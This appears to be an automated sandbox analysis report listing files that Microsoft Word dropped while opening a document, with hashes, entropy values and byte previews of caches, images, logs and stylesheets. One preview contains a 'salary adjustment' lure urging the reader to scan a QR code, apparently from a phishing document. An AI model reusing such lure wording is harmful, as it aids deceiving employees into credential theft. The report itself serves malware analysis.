                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2684
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9133866365139567
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxJx1ILxl9Il8uW+uHgs41hY67SKuFSDnuPtAIUhiE8mwKzd/vc:JPYMHjuO67sFGuPt3UhiE8mwKu
                                                                                                                                                                                                                                                                                                                                                                          MD5:CEE488298D30CDC63372F1D8D4C52599
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F6289C07281AB4CCC9EF48CFC27B1FF310420C11
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E8B6BC4CFADDA7F36F843A7765B9CF4637EB78D3D6EB2CF034D57337B72476F2
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5BF338DB79B24CA5C3704BF32ABE79B348D3751564AB7944D8200E07868DA114E7D5646A43EBF819C0AA002C2E48A35AD2AC1384B86E2DE24079E6BF423F0CE0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".t.k.z.Z.m.b.p.U.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.7.U.v.t.r./.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4542
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.99943040766818
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:rYr70+8qqwQiEOZEcScuCo3DHcHC4v6yr4zaD:rzaqwx/ZPScjo3zci4v6aD
                                                                                                                                                                                                                                                                                                                                                                          MD5:143EB05634390FCBAC65B78D4C39C39F
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1875F11120702F45EACC45BAF5CCFEE89BAEBBA0
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1566CE2CCD993216458471FC11CB9FE2FB47FACAEE634FDC30C0FDE71FE49598
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:316436ABF6D58214D8ABA36C2E6E27FF5D70628DB003066CD499003690EF5BCA601E84D47A591463A3274068FF19D7F55D1CC2E8A81994ABC2EFD3753D1735E1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.F.V.q.a.O.k.1.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.7.U.v.t.r./.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 976 x 972, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):87437
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.903631062875639
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:70mQXJ8wEgqrCnymi5jDJOB1y3CACYiBVDJ2l7mu1s+1xVGFOLb+IjjlL:70mzrCyv5vJS1gADolzRT2oa8lL
                                                                                                                                                                                                                                                                                                                                                                          MD5:F03E240DE81AB7C4F8913A3D1AE4EE56
                                                                                                                                                                                                                                                                                                                                                                          SHA1:383CF08937243A35B699CCF6AC2E581F3013B34F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:A072DFFC57C8B3E7982C403F4D8F56D3356B4FC5CA74E6B02C51D8F99B46CF1E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:998C75EB8EF2E8D2A388EF2FD157587957870EFDECAC2A1458A6F7AA2E3B0CDCE80074DB93F279E21B3EFFFA48580ED77A0DF6B4D3E7183962969D44022459A2
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............%.._....pHYs..........+....U?IDATx........W}...A.H].....y.gzz...t.y..2MB........H.....%....6....l...1......` .....Zg.......].:..?p&....^..=n.-..........9..?..=........O........_...n.m.).7.|..^;<...........0..=z4..W^y....N.......?.pyy..#...p.......f.pO..k.......[4.d..............i..y.W.y.J....7...'OJ........sM..f^}..g...>.(.v...k.@......f.w.....Sw..~....S.........sN%.{........3g...........J......O>.........+..0......`..j._..u.....o.?...t&..A...+4.7.8y..........-...'N....cj....?L{.;.p.=...W'.M.w.G.6..8.......\...O.|...d2.qr.wn..'.}..i.^.......t..?...7.,....~x..g...g.Y....i..-v......._>.....g..I9~....$.5..ol.=z..w.u.(......:.'.|r....8.O....9...;............-.s..=%.....>.p.....7.t........:....\...g....M.f%............./p.o........;.#.........f...9r...'F>3......9~..,V......@G......Z.b...........-........2.;$...o..V..G.}T`.?............r..i.......}...i..>........S.V..G.a+.../&.5@........O>)xI$..b..z.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):7376
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.962557617985385
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:Fhu6Rrx/vv2zAkeKxC7TadyOYzOhp51jLpfghIa6JmUgXpUIocjq+sjEaS6xOBvf:FhZV/vgFR8OqObfxgyb3CpUIoL+sjFON
                                                                                                                                                                                                                                                                                                                                                                          MD5:2042E7AD3835F4C420DE770C2999B209
                                                                                                                                                                                                                                                                                                                                                                          SHA1:79BB47E1FFC5D11B1F8B90FC9FD317E140C27426
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:67DCD852C279B49596A3906BD15E77C116C75272677B926BB5B6A0CC2DC2042E
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:599F1FC4364A00041DDD28A2DEFCC03B6825AF20F792671E0866EA5A190848ED01F7DF52909EC0DCD869A2FA2A00FEAE7A5EC6A148070DD665C3A66A78D4BA06
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............L\......pHYs..........+......IDATx..z.xT....i....\....././..`0.T.......B.!QE......^@.$P.MQG...U@. ......~k......\.;.{..K3.OY.Z.*.H..A!......H......"..C$@`.......!. 0D...H......"..C$@`.......!. 0D...H......"..C$@`.......!. 0D...H......"..C$@`.......!. 0D...H......"..C$@`.......!. 0D...H......"..C$@`|.. .....?.1...H...G.@...x..8..G..t.o..}.:..?..........d.........kc:.?..).P...........v...d......./..^5;.e..j2.~.Qp...p..0.a;.bd.....Q}./..pp..O.........}.Q..cl.V.F...3..8...Yr.....FO0n..r...C..k...#3fl..d..V...M....`..#.w..6rS.,..I.d&.....#....u.7b...`.cFpPl..h.W.e!zX...#.#;..p..4;.a..#.;,..yY8<......;..p|...5p../..x.VzmS..S}.U9.t.n..Y.....z...X._...C....h;2wZ..mYG.w..../.,^..p..jIp..b..qB....l......y..G\..p..r.Kw ...6.._k.....;...1n.....}.....pZD....kb.}...n...?.D.............M.f.....x..q.V*...d....~...o..zm..6.>.\^..n...S..uc.....b..7j.LY8.A..l4!.7t....Z.?.no...W..d..R.j...p. .......WY....W.;.K}.s.....,?T..6.. .
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:PNG image data, 375 x 375, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):24208
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.816262455718971
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:neek0qrsRjgquZEUM0FXOSG5R5M2XXUcJ+tnihwCrsm8VhPb+UgDgT2BIUhTEoAw:TBjqW3jM2XXfou+FiIQhABeUMn
                                                                                                                                                                                                                                                                                                                                                                          MD5:E97EC668058AAAF8E9705316234C2988
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9FA105329E54E175D9466E822788FD9B81910E17
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7D0173FAF8B208BA578107889A0A2E3793D3BC891CD45AAC18C0C556623CB9A3
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:539B1BF293CEE4FF417896FB59EC16C83C962EE9C31E9978136582566F10623110FB026EB21A3874ACE485EF6426B9541FA5B835F5F48B484C7FFCD076AF1640
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...w...w............pHYs..........+....^BIDATx..y.4E.'..3....h....Kkk.4........*...;*.#.."-$.(...6."*...4f)"...Kck...V..V.f..y.{.nE..'.'".V.<O>...5......S.H.o'.t.ILI.]@'.t....2.t.I\.v.N:.$.t.L'.t.W.]..N:.+...I'..n..N.J..t.I'q..e:....2.t.I\.v.N:.$.t.L'.t.W.]..N:.+...I'..n..N.J..t.I'q..e:....2.t.I\.v.N:.$.t.L'.t.W.]..N:.+...I'..n..N.J..t.I'q%...$..s.........~..me....=`((2o.0r."%y[[.E........-\.k....N..(i..m.PPd.8`.xEJ.t...*...X.oY.]fw.+`...V*L^'...7..9^....-.jF.h.Z.].W..y).........E..F.W.$okK....2b...4....5.2......7g..U......q....mm..U3TF.o...j....{.$.....?T.{eyk]...J...+)R.(.$5CEn..%....."..]..K........(N..o...$..WR.$Q..Ij...&5K|.~.H...8}.C).e(^+I.0..HI.x3.....Mj..7.w.D.....$TQ.A..x.$Q..."%...HR3T.6.Y...@"..]..K.j8.u.wc.^.e.U....$..WR.$Q..Ij...&5K|.~.H...e..../........V..-.......d..D.}.j."%k%..[.mR....).lEv.k./.......R#U._..%..$...P..)Y+.6.o.. -.M..e....."...R..3.M.y.....P....h.-.6.....Ma...e..^....~@.Z..-?.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):1536
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2976031788677218
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:mEMEEEul39lCgK1qVRIx1M6lPpqELgMlqELCELUm:c3YP/xzplzrUm
                                                                                                                                                                                                                                                                                                                                                                          MD5:B1FB5B10DE41ADB8797500FF5CAEC82A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3F60387B3AFF6B3304C0A00082D9D96FE5FE84CE
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6B0218038C9D76401498E05E4536E5011D9200D46DE36D9807646553496E71B2
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:607C7F7CFF3E7970C56448E91D557FD0C022AE31C02FB19461A7AA94F7A6371E7FFCF36F12966A5C5A840385FD6B2D1B4F168B233DB584650204975F29F36AB1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...............................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):2052
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.0726707778333013
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:24:e9RYWTp6xq/yUwysk+bjtahKSnSp02c81pUhka+kcw+joiXos1DU5ZtD:YRnp68asV2R6PrD+Es1kTD
                                                                                                                                                                                                                                                                                                                                                                          MD5:CEE1E733F3F0C99B008F5802E6F57CE9
                                                                                                                                                                                                                                                                                                                                                                          SHA1:E872949DB4EEB484D7BF78A9E846E2DCB61B709F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3F6F86AF175315CBCE00A64016812AB6249319CD76BA429479C672DCB4463D5C
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A2FA42FB932619138D775AF57480B3389E457F3D09599FE07C63BA2E76AECF434342D03E61D293CBE4D451A3A5AB61B943ED3A31528E9D8425F811B0D583D3E0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:.././.../...G.o.e.a.s.y. .B.e.n.e.f.i.t.s./.S.a.l.a.r.y. .A.d.j.u.s.t.m.e.n.t...A.c.c.e.s.s. .y.o.u.r. .s.e.c.u.r.e. .d.o.c.u.m.e.n.t. .b.y. .s.c.a.n.n.i.n.g. .t.h.e. .Q.R. .c.o.d.e. .b.e.l.o.w. .w.i.t.h. .y.o.u.r. .s.m.a.r.t.p.h.o.n.e... .T.h.i.s. .w.i.l.l. .t.a.k.e. .y.o.u. .d.i.r.e.c.t.l.y. .t.o. .t.h.e. .d.o.c.u.m.e.n.t...r.e.v.i.e.w. .p.a.g.e.....D.i.s.c.l.a.i.m.e.r.:.........................................................................................................................................................P...H...b...0..............................................................................................................................................................................................................................................................................................$..d......4.....7$.8$.a$......$..d............7$.8$.a$......$..d......<.....7$.8$.a$......$..d............7$.8$.a$......$..dl...........7$.8$.a$......$..d......,.....7$.8$.a
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):20971520
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.011386194959693193
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:3pTgtLu1NN1s9jitXzHr5OIaVm1KxQa3BGBsn:3pTgRu1NN1sjkXzHr5VD1uQa3BGBsn
                                                                                                                                                                                                                                                                                                                                                                          MD5:6D12ACB8E4026AC26974EDCC8D34C1F4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A3530336A66705B473C5859D44ACB8867DBAB1F9
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:497176DCDBBC1E14938CF08BB8DC6D4F9C075D77AE33A04691F0FB29E2D46A98
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5305317B9C50A52F7E90997914A20619E8A96A5B2772F4CC7342DD92CD07157F115B78D30AE51104C7E75FACF09FDAA6B3787E7E329CC3C9BF9BB94E798DB3A0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/13/2024 16:28:50.446.WINWORD (0x1144).0xB50.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"Time":"2024-11-13T16:28:50.446Z","Contract":"Office.System.Activity","Activity.CV":"exLuk77ir0OIu3+yCGAYhQ.7.1","Activity.Duration":261,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...11/13/2024 16:28:50.446.WINWORD (0x1144).0xB50.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-11-13T16:28:50.446Z","Contract":"Office.System.Activity","Activity.CV":"exLuk77ir0OIu3+yCGAYhQ.7","Activity.Duration":711,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDiag
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):20971520
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                                                          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4871192480632223
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):254875
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.003842588822783
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                                                                                                                                                                                                                                                          MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):290
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5081874837369886
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                                                                                                                          MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                                                                                                                                                                                                                                                                                                                                          SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):255948
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.103631650117028
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                                                                                                                                                                                                                                                          MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                                                                                                                                                                                                                                                          SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
